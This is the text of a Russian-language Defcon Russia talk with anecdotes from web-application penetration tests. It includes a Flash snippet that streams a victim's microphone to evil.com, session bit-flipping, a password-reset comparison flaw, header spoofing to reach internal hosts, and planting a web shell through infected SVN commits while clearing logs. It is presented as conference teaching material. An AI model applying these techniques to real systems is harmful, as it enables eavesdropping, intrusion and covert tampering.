Funny hack Забавные истории из практики анализа защищенности веб-приложений 16/02/2012 DCG #7812 г. Москва

Откуда дровишки? Проведение коммерческих аудитов безопасности веб-приложений гг. Исследования популярных веб-приложений ради интереса Допиливание и разбор опубликованных уязвимостей Defcon Russia (DCG #7812)2

Что за дровишки? Клиентские уязвимости веб-приложений Серверные уязвимости веб-приложений Системные уязвимости (уровень ОС) Получение доступа к веб-приложению Повышение привилегий ОС (юникс) Defcon Russia (DCG #7812)3

FUN#1. Забавная 01:00 Мало функционала. Грустно, уныло, скучно. 01:10 Все закрыто авторизацией. 01:40 Набрутилось demo/demo123 01:50 Ничего внутри аккаунта нету, мало прав 04:20 НУХЗ. Может ид. сессии попробовать подобрать? Defcon Russia (DCG #7812)4

FUN#1. Забавная Bit-Flip > > >… 05:13 Да какого х…акера? Ид. прав лежит в ид. сессии. 06:01 Начали перебирать конкретный байт сессии и нашли идентификатор прав суперпользователя. Defcon Russia (DCG #7812)5

FUN#2. А как вы готовите XSS? 22:00 Найдем инъекцию и будет все хорошо 09:10 А может и не найдем инъекцию… 11:40 Ладно, запустим снифать куки хранимкой 19:20 Молодцы, блин, привязали сессию к IP 02:20 Нам нужны свежие мысли 03:13 Ладно, если колцентр общается с пользователя голосом, попробуем снифать МИКРОФОН (Flash) Defcon Russia (DCG #7812)6

FUN#2. А как вы готовите XSS? private function init():void { nc=new NetConnection ; nc.connect (//evil.com,"anchor"); mic=Microphone.getMicrophone(); mic.rate=11; nc.addEventListener (NetStatusEvent.NET_STATUS,checkConnect); } private function checkConnect (e:NetStatusEvent) { good=e.info.code == "NetConnection.Connect.Success"; if (good) { this.attachAudio (mic); this.publish (stream,"live"); } Defcon Russia (DCG #7812)7

FUN#3. Восстановление пароля f5f167f44f4964e6c998dee827110c Открывает сразу сессию для аккаунта Тоже открывает сессию Defcon Russia (DCG #7812)8

FUN#3. Восстановление пароля if($_GET[code]==$code_from_db) Используйте приведение типов. Можем открыть новую сессию для любого аккаунта только по его адресу ;) Defcon Russia (DCG #7812)9

FUN#4. Очень большой портал 14:10 Какой ты большой и красивый… 15:22 Ну тут на полгода скриптов хватит… 16:10 Надо чего-нибудь найти уже… 17:03 Пробрутим поддомены 17:30 Так-c, на beta.domain.com 403 Forbidden 17:40 Пробрутим заголовок X-Real-IP и X- Forwared-From по локальным адресам Defcon Russia (DCG #7812)10

FUN#4. Очень большой портал 18:10 Набрутили внутреннюю сетку, зашли 18:30 На бете куча левых скриптов для дебага и совсем простые пароли 18:55 Есть веб-шелл 19:30 Хорошо настроена ОС, но вот SVN… 20:01 Заражаем пару скриптов в коммитах и чистим логи 10:00 Выкатили новую версию, веб-шелл на боевом получен =) Defcon Russia (DCG #7812)11

FUN#5. Шифрованный ViewState 12:10 Привет, Dot NET 12:50 Привет XSS фильтр… 13:45 Будем искать обходы логики 13:51 ViewState зашифрован :( 14:41 Попробуем поломать авторизацию 15:01 Восстанавливаем свой пароль на почту и получаем код активации 15:30 Вводим код активации на сайт и смотри что происходит дальше Defcon Russia (DCG #7812)12

FUN#5. Шифрованный ViewState 15:31 После ввода валидного кода отправляется второй ajax запрос с логином и ViewState 15:32 Открывается диалог ввода нового пароля 15:33 Отправляем запрос ajax еще раз, с тем же ViewState, но логином admin 13:34 Открывается диалог ввода нового пароля 13:35 Пробуем авторизоваться под admin с новым паролем 13:36 Получаем профит и админку Defcon Russia (DCG #7812)13

Спасибо! Defcon Russia (DCG #7812)14